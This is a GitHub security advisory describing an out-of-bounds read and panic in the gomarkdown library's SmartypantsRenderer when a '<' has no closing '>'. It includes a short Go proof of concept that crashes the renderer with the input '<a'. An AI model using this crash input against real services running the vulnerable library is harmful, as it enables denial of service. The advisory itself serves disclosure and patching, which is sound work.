Sign In

GHSA-77fj-vx54-gvh7

ADVISORY - github

Summary

Summary

Processing a malformed input containing a < character that is not followed by a > character anywhere in the remaining text with a SmartypantsRenderer will lead to Out of Bounds read or a panic.

Details

The smartLeftAngle() function in html/smartypants.go:367-376 performs an out-of-bounds slice operation when processing a < character that is not followed by a > character anywhere in the remaining text. https://github.com/gomarkdown/markdown/blob/37c66b85d6ab025ba67a73ba03b7f3ef55859cca/html/smartypants.go#L367-L376 If the length of the slice is lower than its capacity, this leads to an extra byte of data read. If the length equals the capacity, this leads to a panic.

PoC

package main

import (
    "bytes"
    "fmt"

    "github.com/gomarkdown/markdown/html"
)

func main() {
    src := []byte("<a")

    fmt.Printf("Input: %q  (len=%d, cap=%d)\n", src, len(src), cap(src))

    var buf bytes.Buffer
    sp := html.NewSmartypantsRenderer(html.Smartypants)
    sp.Process(&buf, src) // panics: slice bounds out of range

    fmt.Printf("Output: %q\n", buf.String())
}

Impact

This vulnerability will lead to a Denial of Service / panic on the processing service.

-- The Datadog Security Team

Common Weakness Enumeration (CWE)

ADVISORY - github

CWE-125

Out-of-bounds Read

Impacted images

Advisories

GitHub

CREATED

UPDATED

ADVISORY IDGHSA-77fj-vx54-gvh7
EXPLOITABILITY SCORE

3.9

EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)
CWE-125

CVSS SCORE

7.5high